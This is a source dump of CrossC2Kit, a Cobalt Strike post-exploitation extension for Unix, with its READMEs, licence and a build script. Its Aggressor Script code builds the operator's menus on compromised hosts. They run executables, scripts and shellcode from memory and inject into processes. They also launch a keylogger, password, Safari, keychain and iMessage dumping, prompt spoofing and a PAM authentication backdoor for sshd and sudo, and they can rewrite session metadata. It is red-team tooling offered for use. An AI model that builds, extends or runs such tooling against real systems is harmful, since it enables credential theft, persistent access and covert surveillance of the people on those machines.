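    # and has no effect on the dialog.
    $taskNeedPersistence = "Y";
    # A single-byte XOR (1-255) is obfuscation, not encryption: it only defeats
    # naive string scans of the payload. (Original note: the key could be
    # randomised.) Whether the content is XORed at all is not visible here.
    drow_text($dialog, "taskXorKey", "taskXorKey(1-255): ", 13);

    dbutton_action($dialog, "load");
    dialog_show($dialog);
}

# Dialog callback for "Python-import"; $3 is the dialog's value map.
# Fix: the beacon id is read from the dialog values rather than the
# script-global left by openPythonImportDialog(). (continues on the next line)
sub openPythonImportDialogDialogCallBack {
    $beaconid = $3['beaconid'];
    $pythonFile = $3['pythonFile'];
    binput($beaconid, $pythonFile);
    $taskResType = "info"; # info -> normal message
    $scriptType = 'python-import$';
    $scriptEnginePath = 'null';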
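$scriptLocalPath = $pythonFile;
    $transportArg = '';

    # Base name of the chosen file. Fix: lindexOf() returns $null when there is
    # no '/', and $null + 1 is 1, which dropped the first character of a bare
    # file name; map "not found" to -1 instead.
    $pathIndex = lindexOf($scriptLocalPath, '/');
    if ($pathIndex is $null) {
        $pathIndex = -1;
    }
    $pathIndex += 1;
    $filename = substr($scriptLocalPath, $pathIndex);

    # Module name = file name without its last extension.
    $importName = substr($filename, 0, lindexOf($filename, '.'));
    # Fix: in a dialog callback $1 is the dialog handle, not a beacon id.
    btask($beaconid, "[Python]: import ".$importName);
    $scriptType = $scriptType.$importName;

    if ($scriptType && $scriptLocalPath) {
        # NOTE(review): $scriptType is 'python-import$<module>', so this branch
        # only triggers if the module name contains '/'; intent unclear.
        if (indexOf($scriptType, "/")) {
            $scriptEnginePath = $scriptType;
        }
        brun_script_in_mem($beaconid, $scriptType, $scriptEnginePath, $taskResType, $scriptLocalPath, @());
    } else {
        berror($beaconid, "*[error]: error script load");
        printUsage_importscript($beaconid);
    }
}

# Open the "Python-import" file chooser for session $1.
sub openPythonImportDialog {
    $beaconid = $1;
    $dialog = dialog("Python-import", %(beaconid => $beaconid, pythonFile => ""), &openPythonImportDialogDialogCallBack);
    dialog_description($dialog, "import python file");

    drow_file($dialog, "pythonFile", "Choose *.py file: ");

    dbutton_action($dialog, "load");
    dialog_show($dialog);
}



# Dialog callback for "Run MemoryFile": builds the cc2-run line and sends it.
# Dialog values are concatenated into the command unquoted.
# Fix: the beacon id is read from the dialog values rather than the
# script-global left by openRunMemoryFileDialog(). (continues on the next line)
sub openRunMemoryFileDialogCallBack {
    $beaconid = $3['beaconid'];
    $fileAliasName = $3['fileAliasName'];
    $processName = $3['processName'];
    $taskArgs = $3['taskArgs'];
    $taskType = runType($3['taskType']);
    if ($taskType eq "0") {
        $shell = "cc2-run ".$fileAliasName." ".$processName." ".$taskArgs;
    } else {
        $shell = "cc2-run ".$fileAliasName."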
".$taskArgs;
    }
    binput($beaconid, "shell ".$shell);
    bshell($beaconid, $shell);
}

# Open the "Run MemoryFile" dialog for session $1. The default text of each
# field is a placeholder that is sent verbatim if the operator leaves it.
sub openRunMemoryFileDialog {
    $beaconid = $1;
    $dialog = dialog("Run MemoryFile", %(beaconid => $beaconid, fileAliasName => "fileAliasName", processName => "processName (ELF/MachO need)", taskType => "", taskArgs => "taskArgs"), &openRunMemoryFileDialogCallBack);
    dialog_description($dialog, "run executable file from memory");

    drow_text($dialog, "fileAliasName", "fileAliasName: ", "fileAliasName");
    drow_text($dialog, "processName", "processName: ", "processName");
    drow_combobox($dialog, "taskType", "taskType: ", @("ELF/MachO", "so/dylib"));
    drow_text($dialog, "taskArgs", "taskArgs: ", "taskArgs");

    dbutton_action($dialog, "load");
    dialog_show($dialog);
}


# Right-click menu for SSH sessions; $1 is the array of selected session ids.
# Helpers such as openElevateDialog / open*Dialog / cc2_*_status are not
# defined in this file and are expected from the includes above.
popup ssh {
    separator();
    menu "&Access" {
        item "&Elevate" { openElevateDialog($1); }
    }
    menu "&CrossC2 Kit" {
        menu "&Process" {
            menu "&executable" {
                item "&list" {
                    binput($1, "shell cc2-memoryList");
                    bshell($1, "cc2-memoryList");
                }
                item "&load" {
                    openMemoryFileLoadDialog($1);
                }
                item "&run" {
                    openRunMemoryFileDialog($1);
                }
                #item "&unload" {
                #}
            }
            # Per-session item, shown only when the status helper returns a value.
            foreach $bid ($1) {
                $f_shellcode_status = cc2_shellcode_status($bid);
                if ($f_shellcode_status) {
                    item "&run shellcode" {
                        openShellCodeDialog($bid);
                    }
                }
            }
        }
        menu "&ENV" {
            item "&setenv" {
                openSetEnvDialog($1);
            }
            item "&unsetenv" {
                openUnSetEnvDialog($1);
            }
        }
        menu "&Script" {
            item "&python-import" {
                openPythonImportDialog($1);
            }
            item "&run script" {
                foreach $bid ($1) {
                    openRunScriptDialog($bid);
                }
            }
        }
        menu "Job Manager" {
            item "List" {
                openJobDialog($1, @("list"));
            }
            item "Kill"
{
                openJobDialog($1, @("kill"));
            }
            item "Kill All" {
                openJobDialog($1, @("kill", "all"));
            }
        }
        separator();
        # Rewrites what the team server displays for the session (OS type,
        # internal IP, host name). openModifyMetaData is not defined in this
        # file; its third argument is presumably the pre-filled value.
        menu "Modify MetaData" {
            menu "&Operating System" {
                item "&Android" { openModifyMetaData($1, "setostype", "android"); }
                item "Apple &iOS" { openModifyMetaData($1, "setostype", "Apple iOS"); }
                item "&Cisco IOS" { openModifyMetaData($1, "setostype", "Cisco IOS"); }
                item "Fire&wall" { openModifyMetaData($1, "setostype", "Firewall"); }
                item "&FreeBSD" { openModifyMetaData($1, "setostype", "FreeBSD"); }
                item "&Linux" { openModifyMetaData($1, "setostype", "Linux"); }
                item "&MacOS X" { openModifyMetaData($1, "setostype", "MacOS X"); }
                item "&NetBSD" { openModifyMetaData($1, "setostype", "NetBSD"); }
                item "&OpenBSD" { openModifyMetaData($1, "setostype", "OpenBSD"); }
                item "&Printer" { openModifyMetaData($1, "setostype", "Printer"); }
                item "&Solaris" { openModifyMetaData($1, "setostype", "Solaris"); }
                item "&Unknown" { openModifyMetaData($1, "setostype", "Unknown"); }
                item "&VMware" { openModifyMetaData($1, "setostype", "VMware"); }
                # All four Windows entries send the same value, "Windows".
                menu "&Windows" {
                    item "1. 95/98/2000" { openModifyMetaData($1, "setostype", "Windows"); }
                    item "2. XP/2003" { openModifyMetaData($1, "setostype", "Windows"); }
                    item "3. Vista/7" { openModifyMetaData($1, "setostype", "Windows"); }
                    item "4.
8/10/RT" { openModifyMetaData($1, "setostype", "Windows"); }
                }
            }
            item "Set Internal IP" {
                openModifyMetaData($1, "setlocalip", "10.0.0.1");
            }
            item "Set HostName" {
                openModifyMetaData($1, "sethostname", "test_hostname");
            }
        }
        separator();
        # Per-session entries that appear only when the module's status helper
        # reports a value. Note the closures use $1 (the selection) here but
        # $bid in the Gather menu below.
        local('$bid $f_status $f_ps_inject_status $f_shellcode_status');
        foreach $bid ($1) {
            $f_status = cc2_frp_status($bid);
            if ($f_status) {
                item("Proxy(FRP) - ".$f_status, { openProxyDialog($1); });
            }
            $f_ps_inject_status = cc2_inject_status($bid);
            if ($f_ps_inject_status) {
                item("ProcessInject - ".$f_ps_inject_status, {
                    openInjectD
ialog($1);
                });
            }
        }
        menu "&Gather" {
            # $prompt_spoof_status is used below but not in this local() list.
            local('$bid $safari_d_status $keychain_d_status $keylogger_status $imessage_d_status $mimipenguin_status $auth_pam_status $auth_ssh_status');
            foreach $bid ($1) {
                $safari_d_status = cc2_safari_dump_status($bid);
                if ($safari_d_status) {
                    item "Safari Dump" {
                        openSafariDialog($bid);
                    }
                }
                $keychain_d_status = cc2_keychain_dump_status($bid);
                if ($keychain_d_status) {
                    # Empty handler: the item is shown but does nothing.
                    item "Keychain Dump" {

                    }
                }
                $keylogger_status = cc2_keylogger_status($bid);
                if ($keylogger_status) {
                    item("Keylogger - ".$keylogger_status, {
                        openKeyloggerDialog($bid);
                    });
                }
                $imessage_d_status = cc2_iMessage_dump_status($bid);
                if ($imessage_d_status) {
                    item "iMessage Dump" {
                        openIMessageDumpDialog($bid);
                    }
                }
                $mimipenguin_status = cc2_mimipenguin_status($bid);
                if ($mimipenguin_status) {
                    item("Dump Password - ".$mimipenguin_status, {
                        openMimipenguinDialog($bid);
                    });
                }
                $prompt_spoof_status = cc2_prompt_spoof_status($bid);
                if ($prompt_spoof_status) {
                    item("PromptSpoof - ".$prompt_spoof_status, {
                        openPromptSpoofDialog($bid);
                    });
                }
                $auth_pam_status =
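cc2_auth_status($bid);
                if ($auth_pam_status) {
                    menu "PAM" {
                        item("PAM(sshd/sudo/su/passwd) - ".cc2_auth_status($bid),{
                            openAuthKitDialog($bid);
                        });
                        item "uninstall" {
                            openAuthKitUninstallDialog($bid);
                        }
                    }
                }
                $auth_ssh_status = cc2_ssh_status($bid);
                if ($auth_ssh_status) {
                    menu "ssh_client" {
                        item("ssh - ".cc2_ssh_status($bid),{
                            binput($bid, "help cc2_ssh");
                        });
                    }
                }
            }
        }
    }
}

# Console aliases wrapping the bcc2_* helpers from CrossC2Kit.cna.
ssh_alias spawn {
    bcc2_spawn($1);
}

ssh_alias getsystem {
    bcc2_getsystem($1);
}

ssh_alias setenv {
    bcc2_setenv($1, $2, $3);
}

ssh_alias unsetenv {
    bcc2_unsetenv($1, $2);
}

ssh_command_register("spawn", "Spawn a new session");
ssh_command_register("getsystem", "Promote the session with uid=0 temporary permission to root session");
# The usage example puts "./" first in PATH. That makes every command lookup
# depend on the current directory, so a binary planted there shadows the real
# one; in practice prefer absolute directories first.
ssh_command_register("setenv", "Set the environment variables of the session", "\nUsage: setenv \n\tsetenv PATH ./:/usr/bin/\n");
# Fix: the unsetenv alias above was never registered, so it had no help entry.
ssh_command_register("unsetenv", "Remove an environment variable from the session", "\nUsage: unsetenv \n\tunsetenv http_proxy\n");


# Left status-bar text for an SSH session: "[user@computer][arch] PID=pid".
# $2 is the session metadata map. $user is cut at its first space and the pid
# is taken from between the first "(" and ")" of the computer field.
# Fix: $usi/$si/$ei are declared local (they leaked to script scope before).
set SSH_SBAR_LEFT {
    local('$computer $user $pid $barch $usi $si $ei');
    ($computer, $user, $barch) = values($2, @('computer', 'user', 'barch'));
    $usi = indexOf($user, " ");
    if ($usi ne $null) {
        $user = substr($user, 0, $usi);
    }
    $si = indexOf($computer, "(");
    $si = $si + 1;
    $ei = indexOf($computer, ")");
    $pid = substr($computer, $si, $ei);
    return "[ $+ $user\@$computer $+ ][ $+ $barch $+ ] PID=$pid";
}

# beaconid, %meta
# Right status-bar text: the session note (colour 2) followed by the
# last-seen time when a note is set, else just the last-seen time.
# (continues on the next page line)
set SSH_SBAR_RIGHT {
    if ($2['note'] ne "") {
        return "\c2" . $2['note'] . " \olast: " . $2['lastf'] . " ";
    }
    else {
        return "last: " . $2['lastf'] .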
" "; 348 | } 349 | } 350 | 351 | 352 | 353 | # Useful aliases, placed in kitloader because I always have this loaded 354 | # from 'Und3rf10w - KitLoader.cna' 355 | 356 | ssh_alias cat { 357 | if ($2){ 358 | bshell($1, "cat $2"); 359 | } else { 360 | berror($1, "Error: You must specify a file"); 361 | } 362 | } 363 | ssh_command_register("cat", "Displays the contents of a file", "Use: cat [file]\n\nDisplays the contents of [file]"); 364 | 365 | ssh_alias tail { 366 | if ($2){ 367 | bshell($1, "tail $2"); 368 | } else { 369 | berror($1, "Error: You must specify a file"); 370 | } 371 | } 372 | ssh_command_register("tail", "Print the last 10 lines of a file", "Use: tail [file]\n\nDisplays last 10 lines of [file]"); 373 | 374 | ssh_alias head { 375 | if ($2){ 376 | bshell($1, "head $2"); 377 | } else { 378 | berror($1, "Error: You must specify a file"); 379 | } 380 | } 381 | ssh_command_register("head", "Print the first 10 lines of a file", "Use: head [file]\n\nDisplays first 10 lines of [file]"); 382 | 383 | 384 | # $script_path = script_resource("third-party"); 385 | # @scripts_dir = ls($script_path); 386 | println("\n\n------------- load third-party ----------------"); 387 | 388 | sub include_file { 389 | local('$s_file'); 390 | $s_file = $1; 391 | if ("load.cna" isin $s_file) { 392 | include($s_file); 393 | } 394 | } 395 | 396 | sub parse_dir { 397 | local('$dir $script_path @scripts_dir'); 398 | $dir = $1; 399 | if (-isDir $dir) { 400 | @scripts_dir = ls($dir); 401 | 402 | local('$s_dir'); 403 | foreach $s_dir(@scripts_dir) { 404 | if (-isDir $s_dir) { 405 | # println("[dir]: $s_dir"); 406 | parse_dir($s_dir); 407 | } else { 408 | # println("[file]: $s_dir"); 409 | include_file($s_dir); 410 | } 411 | } 412 | } else { 413 | # println("[file]: $dir"); 414 | include_file($dir); 415 | } 416 | } 417 | 418 | parse_dir(script_resource("third-party")); -------------------------------------------------------------------------------- /LICENSE: 
-------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 
39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CrossC2 Kit 2 | 3 | [README](README.md) | [中文文档](README_zh.md) 4 | 5 | CrossC2Kit is a post-exploitation extension for Unix platforms derived from CrossC2, built on the open-source **Aggressor Script** engine. It can be used to create automation that simulates Red Team operating procedures and to extend the **CobaltStrike** client. 6 | 7 | **CrossC2Kit** inherits the original features of **CobaltStrike**, so development and scripting syntax still follow the official documentation: https://trial.cobaltstrike.com/aggressor-script/index.html 8 | 9 | 10 | ![](media/16295280892271/16295284817531.jpg) 11 | 12 | However, it also adds some API extensions on top of CrossC2 for controlling Beacons on UNIX platforms. Its main function is to parse and execute, directly from memory, user-supplied dynamic libraries (`.so` / `.dylib`), executables (`ELF` / `MachO`) and scripts (`bash` / `python` / `php` ...). 
At the same time, some of CobaltStrike's data-set interfaces are kept, such as 13 | `portscan`, `screenshots`, `keylogger`, `credentials`, etc., so kits such as **Portscan** can be developed quickly. And if you are familiar with the native CS protocol, you can return more complex data results for more flexible metadata collection. 14 | ![](media/15854585486601/15854593957704.jpg) 15 | 16 | ## Basic functions 17 | 18 | **`Interpreter related plug-ins`**、**`Password dump module`**、**`Authentication backdoor modules`**、**`Information collection modules`**、**`Traffic proxy module`**、**`Keylogger module`**、**`Privilege promotion module`**、**`Task management module`** 19 | 20 | See wiki for details: [About CrossC2Kit](https://github.com/CrossC2/CrossC2Kit/wiki/About-CrossC2-Kit) 21 | 22 | ## API Reference: 23 | 24 | Memory loading related API: [API wiki](https://gloxec.github.io/CrossC2/zh_cn/api) 25 | 26 | API function manual:[API Reference](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference) 27 | 28 | API demo:[/third-party/api_demo/load.cna](https://github.com/CrossC2/CrossC2Kit/blob/e5bcf1a60a829c80bf7cc139841c6ccac968a43b/third-party/api_demo/load.cna) 29 | 30 | ## Custom expansion 31 | 32 | Use **CrossC2Kit** to develop customized extensions: 33 | Put the custom extension — its categorized components, compilable source code, configuration files, etc. — into the `third-party` folder; the client will automatically load the extension's `load.cna`. Note that every `load.cna` found under `third-party` is included and executed by the client at load time, so only place extensions there that you trust. 34 | 35 | https://github.com/CrossC2/CrossC2Kit/blob/b108739d60abaafca66183fd1584bde6a8aa4aed/third-party/readme.md?plain=1#L11-L21 36 | 37 | For details: https://github.com/CrossC2/CrossC2Kit/tree/template/third-party 38 | 39 | 40 | ## Pull Request 41 | 42 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 43 | 2. cd CrossC2Kit && mkdir third-party 44 | 3. Place the extension plug-in in the **third-party** directory and open a **Pull Request** 45 | 4. 
**Pull Request** will merge after automatic compilation 46 | 47 | 48 | 49 | 50 | ```c 51 | ├── third-party 52 | │   ├── test.cna 53 | │   └── util 54 | │ ├── lpe // Type of plugin 55 | │ │ ├── cve-2021-1102 // The name of the plugin 56 | │ │ │ ├── load.cna // Loading file of the plug-in * 57 | │ │ │ ├── readme.md // Description document of plug-in 58 | │ │ │ ├── src // The source code directory of binary components in the plugin 59 | │ │ │ │ ├── exp.c // Source code to be compiled * 60 | │ │ │ │ └── makefile // Automatic compiled configuration file * 61 | │ │ │ └── testa.cna // CNA script used inside the plug-in 62 | │ │ └── cve-2022-2202 63 | │   │   ├── load.cna 64 | │   │   ├── readme.md 65 | │   │   └── src 66 | │   │   ├── exp.c 67 | │   │   └── makefile 68 | │   └── pass 69 | │   ├── linux-login 70 | │   │   ├── load.cna 71 | │   │   └── src 72 | │   │   ├── exp.c 73 | │   │   └── makefile 74 | │   └── readme.md 75 | ``` 76 | 77 | 5. The compilation results will be displayed in **Summary**, including 78 | 79 | `System architecture information` 80 | 81 | `Compile process` 82 | 83 | `Compilation results symbol information` 84 | 85 | `GLIBC version information contained in Linux programs` 86 | 87 | `The overall result of compilation` 88 | 89 | ![](media/16295280892271/16547563992094.jpg) 90 | 91 | ![](media/16295280892271/16547565084907.jpg) 92 | 93 | 94 | -------------------------------------------------------------------------------- /README_zh.md: -------------------------------------------------------------------------------- 1 | # CrossC2 Kit 2 | 3 | [README](README.md) | [中文文档](README_zh.md) 4 | 5 | CrossC2Kit 是围绕着CrossC2 衍生出的Unix平台后渗透扩展,采用 **Aggressor Script** 开源脚本引擎。可以用来创建自动化来模拟红队操作过程,以及扩展CobaltStrike客户端。 6 | 7 | CrossC2Kit 整体继承于CobaltStrike原有的功能,所以开发与编写语法仍然参照官方文档: https://trial.cobaltstrike.com/aggressor-script/index.html 8 | 9 | 10 | ![](media/16295280892271/16295284817531.jpg) 11 | 12 | 但它在 CrossC2 之上又进行了一些API拓展,用于控制 Unix 平台beacon,主要功能为从内存解析执行用户下发的 
动态库 ( .so / .dylib ) 与 可执行文件 ( ELF / MachO ) 以及 脚本 ( bash / python / php ... )。同时预留了CobaltStrike的一些数据集接口,例如 13 | `端口扫描`, `屏幕截图`, `键盘记录`, `密码凭证` 等等,可以快捷开发portscan等等套件。以及如果熟悉CS原生协议的话,可以指定更加复杂的一些数据结果等进行更灵活的元数据收集。 14 | ![](media/15854585486601/15854593957704.jpg) 15 | 16 | ## 基础功能: 17 | 18 | 内存解释器、内存执行、密码dump、认证后门、信息收集(浏览器、keychain),流量代理,键盘记录模块,网络探测模块,权限提升,任务管理等。 19 | 20 | 详情见wiki: [About CrossC2Kit](https://github.com/CrossC2/CrossC2Kit/wiki/About-CrossC2-Kit) 21 | 22 | ## API 文档: 23 | 24 | 内存加载相关API: [API wiki](https://gloxec.github.io/CrossC2/zh_cn/api) 25 | 26 | API函数手册:[API Reference](https://github.com/CrossC2/CrossC2Kit/wiki/API-Reference) 27 | 28 | API demo链接:[/third-party/api_demo/load.cna](https://github.com/CrossC2/CrossC2Kit/blob/e5bcf1a60a829c80bf7cc139841c6ccac968a43b/third-party/api_demo/load.cna) 29 | 30 | ## 自定义拓展: 31 | 32 | 使用 **CrossC2Kit** 开发自定义的扩展: 33 | 将自定义的扩展按照分类、编译源码,配置文件等放入`third-party`文件夹中,客户端将会自动加载扩展的`load.cna` 34 | 35 | https://github.com/CrossC2/CrossC2Kit/blob/b108739d60abaafca66183fd1584bde6a8aa4aed/third-party/readme.md?plain=1#L11-L21 36 | 37 | 详见例子: https://github.com/CrossC2/CrossC2Kit/tree/template/third-party 38 | 39 | 40 | ## 插件提交方式 41 | 42 | 1. git clone https://github.com/CrossC2/CrossC2Kit.git 43 | 2. cd CrossC2Kit && mkdir third-party 44 | 3. 将扩展插件置入该目录后进行 pull request 45 | 4. 
pull request 项目将在自动编译通过后进行合并 46 | 47 | 48 | ```c 49 | ├── third-party 50 | │   ├── test.cna 51 | │   └── util 52 | │ ├── lpe // 插件分类 53 | │ │ ├── cve-2021-1102 // 插件名称 54 | │ │ │ ├── load.cna // 插件启动入口 * 55 | │ │ │ ├── readme.md // 插件文档 56 | │ │ │ ├── src // 插件包含的二进制组件源码目录 57 | │ │ │ │ ├── exp.c // 待编译的源码 * 58 | │ │ │ │ └── makefile // 自动编译的工程配置文件 * 59 | │ │ │ └── testa.cna // 插件内部用到的cna脚本 60 | │ │ └── cve-2022-2202 61 | │   │   ├── load.cna 62 | │   │   ├── readme.md 63 | │   │   └── src 64 | │   │   ├── exp.c 65 | │   │   └── makefile 66 | │   └── pass 67 | │   ├── linux-login 68 | │   │   ├── load.cna 69 | │   │   └── src 70 | │   │   ├── exp.c 71 | │   │   └── makefile 72 | │   └── readme.md 73 | ``` 74 | 75 | 5. 编译结果将在 **summary** 中显示,包含 76 | 77 | `系统架构信息` 78 | 79 | `编译过程` 80 | 81 | `编译结果符号信息` 82 | 83 | `Linux包含GLIBC版本信息` 84 | 85 | `编译整体结果` 86 | 87 | ![](media/16295280892271/16547563992094.jpg) 88 | 89 | ![](media/16295280892271/16547565084907.jpg) 90 | 91 | 92 | -------------------------------------------------------------------------------- /compile.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd /tmp/third-party 4 | for module in `find ./ | grep "makefile" | awk -F'/makefile' '{print $1}'` 5 | do 6 | cd /tmp/third-party 7 | cd $module 8 | make 9 | make clean 10 | done -------------------------------------------------------------------------------- /gather/browser/cc2_chrome_dump.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/browser/cc2_chrome_dump.dylib -------------------------------------------------------------------------------- /gather/browser/cc2_safari_dump.dylib: -------------------------------------------------------------------------------- 
